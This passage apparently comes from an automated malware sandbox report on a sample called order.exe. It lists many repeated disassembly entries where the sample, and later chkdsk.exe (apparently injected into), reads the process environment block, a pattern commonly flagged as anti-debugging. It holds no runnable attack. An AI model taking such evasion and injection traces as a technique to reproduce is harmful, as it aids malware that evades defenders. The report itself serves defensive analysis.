      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46AA16 mov eax, dword ptr fs:[00000030h]12_2_1E46AA16
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9240 mov eax, dword ptr fs:[00000030h]12_2_1E3A9240
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9240 mov eax, dword ptr fs:[00000030h]12_2_1E3A9240
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9240 mov eax, dword ptr fs:[00000030h]12_2_1E3A9240
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9240 mov eax, dword ptr fs:[00000030h]12_2_1E3A9240
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]12_2_1E3BAAB0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]12_2_1E3BAAB0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]12_2_1E3DFAB0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]12_2_1E3A52A5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]12_2_1E3A52A5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]12_2_1E3A52A5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]12_2_1E3A52A5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]12_2_1E3A52A5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DD294 mov eax, dword ptr fs:[00000030h]12_2_1E3DD294
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DD294 mov eax, dword ptr fs:[00000030h]12_2_1E3DD294
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]12_2_1E3D2AE4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]12_2_1E3D2ACB
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E478B58 mov eax, dword ptr fs:[00000030h]12_2_1E478B58
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]12_2_1E3D3B7A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]12_2_1E3D3B7A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]12_2_1E3ADB60
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46131B mov eax, dword ptr fs:[00000030h]12_2_1E46131B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AF358 mov eax, dword ptr fs:[00000030h]12_2_1E3AF358
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]12_2_1E3ADB40
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4253CA mov eax, dword ptr fs:[00000030h]12_2_1E4253CA
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4253CA mov eax, dword ptr fs:[00000030h]12_2_1E4253CA
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]12_2_1E3D4BAD
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]12_2_1E3D4BAD
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]12_2_1E3D4BAD
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2397 mov eax, dword ptr fs:[00000030h]12_2_1E3D2397
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DB390 mov eax, dword ptr fs:[00000030h]12_2_1E3DB390
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]12_2_1E3B1B8F
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]12_2_1E3B1B8F
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E45D380 mov ecx, dword ptr fs:[00000030h]12_2_1E45D380
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46138A mov eax, dword ptr fs:[00000030h]12_2_1E46138A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]12_2_1E3CDBE9
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]12_2_1E3D03E2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]12_2_1E3D03E2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]12_2_1E3D03E2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]12_2_1E3D03E2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]12_2_1E3D03E2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]12_2_1E3D03E2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E475BA5 mov eax, dword ptr fs:[00000030h]12_2_1E475BA5
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA830 mov eax, dword ptr fs:[00000030h]12_2_1E3CA830
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA830 mov eax, dword ptr fs:[00000030h]12_2_1E3CA830
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA830 mov eax, dword ptr fs:[00000030h]12_2_1E3CA830
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA830 mov eax, dword ptr fs:[00000030h]12_2_1E3CA830
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D002D mov eax, dword ptr fs:[00000030h]12_2_1E3D002D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D002D mov eax, dword ptr fs:[00000030h]12_2_1E3D002D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D002D mov eax, dword ptr fs:[00000030h]12_2_1E3D002D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D002D mov eax, dword ptr fs:[00000030h]12_2_1E3D002D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D002D mov eax, dword ptr fs:[00000030h]12_2_1E3D002D
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BB02A mov eax, dword ptr fs:[00000030h]12_2_1E3BB02A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BB02A mov eax, dword ptr fs:[00000030h]12_2_1E3BB02A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BB02A mov eax, dword ptr fs:[00000030h]12_2_1E3BB02A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BB02A mov eax, dword ptr fs:[00000030h]12_2_1E3BB02A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E471074 mov eax, dword ptr fs:[00000030h]12_2_1E471074
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E462073 mov eax, dword ptr fs:[00000030h]12_2_1E462073
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E474015 mov eax, dword ptr fs:[00000030h]12_2_1E474015
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E474015 mov eax, dword ptr fs:[00000030h]12_2_1E474015
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E427016 mov eax, dword ptr fs:[00000030h]12_2_1E427016
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E427016 mov eax, dword ptr fs:[00000030h]12_2_1E427016
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E427016 mov eax, dword ptr fs:[00000030h]12_2_1E427016
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C0050 mov eax, dword ptr fs:[00000030h]12_2_1E3C0050
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C0050 mov eax, dword ptr fs:[00000030h]12_2_1E3C0050
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]12_2_1E3DF0BF
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]12_2_1E3DF0BF
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]12_2_1E3DF0BF
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3E90AF mov eax, dword ptr fs:[00000030h]12_2_1E3E90AF
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]12_2_1E43B8D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]12_2_1E43B8D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]12_2_1E43B8D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]12_2_1E43B8D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]12_2_1E43B8D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]12_2_1E43B8D0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D20A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D20A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D20A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D20A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D20A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D20A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9080 mov eax, dword ptr fs:[00000030h]12_2_1E3A9080
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E423884 mov eax, dword ptr fs:[00000030h]12_2_1E423884
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E423884 mov eax, dword ptr fs:[00000030h]12_2_1E423884
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A58EC mov eax, dword ptr fs:[00000030h]12_2_1E3A58EC
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]12_2_1E3A40E1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]12_2_1E3A40E1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]12_2_1E3A40E1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D513A mov eax, dword ptr fs:[00000030h]12_2_1E3D513A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D513A mov eax, dword ptr fs:[00000030h]12_2_1E3D513A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C4120 mov eax, dword ptr fs:[00000030h]12_2_1E3C4120
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C4120 mov eax, dword ptr fs:[00000030h]12_2_1E3C4120
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C4120 mov eax, dword ptr fs:[00000030h]12_2_1E3C4120
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C4120 mov eax, dword ptr fs:[00000030h]12_2_1E3C4120
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]12_2_1E3C4120
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9100 mov eax, dword ptr fs:[00000030h]12_2_1E3A9100
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9100 mov eax, dword ptr fs:[00000030h]12_2_1E3A9100
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A9100 mov eax, dword ptr fs:[00000030h]12_2_1E3A9100
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AB171 mov eax, dword ptr fs:[00000030h]12_2_1E3AB171
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AB171 mov eax, dword ptr fs:[00000030h]12_2_1E3AB171
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AC962 mov eax, dword ptr fs:[00000030h]12_2_1E3AC962
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CB944 mov eax, dword ptr fs:[00000030h]12_2_1E3CB944
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CB944 mov eax, dword ptr fs:[00000030h]12_2_1E3CB944
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D61A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]12_2_1E3D61A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4341E8 mov eax, dword ptr fs:[00000030h]12_2_1E4341E8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D2990 mov eax, dword ptr fs:[00000030h]12_2_1E3D2990
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DA185 mov eax, dword ptr fs:[00000030h]12_2_1E3DA185
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CC182 mov eax, dword ptr fs:[00000030h]12_2_1E3CC182
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]12_2_1E3AB1E1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]12_2_1E3AB1E1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]12_2_1E3AB1E1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4649A4 mov eax, dword ptr fs:[00000030h]12_2_1E4649A4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4649A4 mov eax, dword ptr fs:[00000030h]12_2_1E4649A4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4649A4 mov eax, dword ptr fs:[00000030h]12_2_1E4649A4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4649A4 mov eax, dword ptr fs:[00000030h]12_2_1E4649A4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4269A6 mov eax, dword ptr fs:[00000030h]12_2_1E4269A6
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4251BE mov eax, dword ptr fs:[00000030h]12_2_1E4251BE
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4251BE mov eax, dword ptr fs:[00000030h]12_2_1E4251BE
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4251BE mov eax, dword ptr fs:[00000030h]12_2_1E4251BE
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4251BE mov eax, dword ptr fs:[00000030h]12_2_1E4251BE
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005630CA mov eax, dword ptr fs:[00000030h]12_2_005630CA
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005685C3 mov eax, dword ptr fs:[00000030h]12_2_005685C3
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00567879 mov eax, dword ptr fs:[00000030h]12_2_00567879
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00562CED mov eax, dword ptr fs:[00000030h]12_2_00562CED
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056252E mov eax, dword ptr fs:[00000030h]12_2_0056252E
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_005685C8 mov eax, dword ptr fs:[00000030h]12_2_005685C8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056865F mov eax, dword ptr fs:[00000030h]12_2_0056865F
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00568603 mov eax, dword ptr fs:[00000030h]12_2_00568603
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00568633 mov eax, dword ptr fs:[00000030h]12_2_00568633
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0517A537 mov eax, dword ptr fs:[00000030h]19_2_0517A537
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BE539 mov eax, dword ptr fs:[00000030h]19_2_051BE539
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05103D34 mov eax, dword ptr fs:[00000030h]19_2_05103D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C8D34 mov eax, dword ptr fs:[00000030h]19_2_051C8D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05124D3B mov eax, dword ptr fs:[00000030h]19_2_05124D3B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05124D3B mov eax, dword ptr fs:[00000030h]19_2_05124D3B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05124D3B mov eax, dword ptr fs:[00000030h]19_2_05124D3B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FAD30 mov eax, dword ptr fs:[00000030h]19_2_050FAD30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05117D50 mov eax, dword ptr fs:[00000030h]19_2_05117D50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05133D43 mov eax, dword ptr fs:[00000030h]19_2_05133D43
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05173540 mov eax, dword ptr fs:[00000030h]19_2_05173540
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051A3D40 mov eax, dword ptr fs:[00000030h]19_2_051A3D40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511C577 mov eax, dword ptr fs:[00000030h]19_2_0511C577
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511C577 mov eax, dword ptr fs:[00000030h]19_2_0511C577
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F2D8A mov eax, dword ptr fs:[00000030h]19_2_050F2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F2D8A mov eax, dword ptr fs:[00000030h]19_2_050F2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F2D8A mov eax, dword ptr fs:[00000030h]19_2_050F2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F2D8A mov eax, dword ptr fs:[00000030h]19_2_050F2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F2D8A mov eax, dword ptr fs:[00000030h]19_2_050F2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512FD9B mov eax, dword ptr fs:[00000030h]19_2_0512FD9B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512FD9B mov eax, dword ptr fs:[00000030h]19_2_0512FD9B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05122581 mov eax, dword ptr fs:[00000030h]19_2_05122581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05122581 mov eax, dword ptr fs:[00000030h]19_2_05122581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05122581 mov eax, dword ptr fs:[00000030h]19_2_05122581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05122581 mov eax, dword ptr fs:[00000030h]19_2_05122581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05121DB5 mov eax, dword ptr fs:[00000030h]19_2_05121DB5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05121DB5 mov eax, dword ptr fs:[00000030h]19_2_05121DB5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05121DB5 mov eax, dword ptr fs:[00000030h]19_2_05121DB5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C05AC mov eax, dword ptr fs:[00000030h]19_2_051C05AC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C05AC mov eax, dword ptr fs:[00000030h]19_2_051C05AC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051235A1 mov eax, dword ptr fs:[00000030h]19_2_051235A1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176DC9 mov eax, dword ptr fs:[00000030h]19_2_05176DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176DC9 mov eax, dword ptr fs:[00000030h]19_2_05176DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176DC9 mov eax, dword ptr fs:[00000030h]19_2_05176DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176DC9 mov ecx, dword ptr fs:[00000030h]19_2_05176DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176DC9 mov eax, dword ptr fs:[00000030h]19_2_05176DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176DC9 mov eax, dword ptr fs:[00000030h]19_2_05176DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051A8DF1 mov eax, dword ptr fs:[00000030h]19_2_051A8DF1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510D5E0 mov eax, dword ptr fs:[00000030h]19_2_0510D5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510D5E0 mov eax, dword ptr fs:[00000030h]19_2_0510D5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BFDE2 mov eax, dword ptr fs:[00000030h]19_2_051BFDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BFDE2 mov eax, dword ptr fs:[00000030h]19_2_051BFDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BFDE2 mov eax, dword ptr fs:[00000030h]19_2_051BFDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BFDE2 mov eax, dword ptr fs:[00000030h]19_2_051BFDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C740D mov eax, dword ptr fs:[00000030h]19_2_051C740D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C740D mov eax, dword ptr fs:[00000030h]19_2_051C740D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C740D mov eax, dword ptr fs:[00000030h]19_2_051C740D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1C06 mov eax, dword ptr fs:[00000030h]19_2_051B1C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176C0A mov eax, dword ptr fs:[00000030h]19_2_05176C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176C0A mov eax, dword ptr fs:[00000030h]19_2_05176C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176C0A mov eax, dword ptr fs:[00000030h]19_2_05176C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176C0A mov eax, dword ptr fs:[00000030h]19_2_05176C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512BC2C mov eax, dword ptr fs:[00000030h]19_2_0512BC2C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0518C450 mov eax, dword ptr fs:[00000030h]19_2_0518C450
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0518C450 mov eax, dword ptr fs:[00000030h]19_2_0518C450
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512A44B mov eax, dword ptr fs:[00000030h]19_2_0512A44B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511746D mov eax, dword ptr fs:[00000030h]19_2_0511746D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510849B mov eax, dword ptr fs:[00000030h]19_2_0510849B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C8CD6 mov eax, dword ptr fs:[00000030h]19_2_051C8CD6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B14FB mov eax, dword ptr fs:[00000030h]19_2_051B14FB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176CF0 mov eax, dword ptr fs:[00000030h]19_2_05176CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176CF0 mov eax, dword ptr fs:[00000030h]19_2_05176CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05176CF0 mov eax, dword ptr fs:[00000030h]19_2_05176CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511F716 mov eax, dword ptr fs:[00000030h]19_2_0511F716
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0518FF10 mov eax, dword ptr fs:[00000030h]19_2_0518FF10
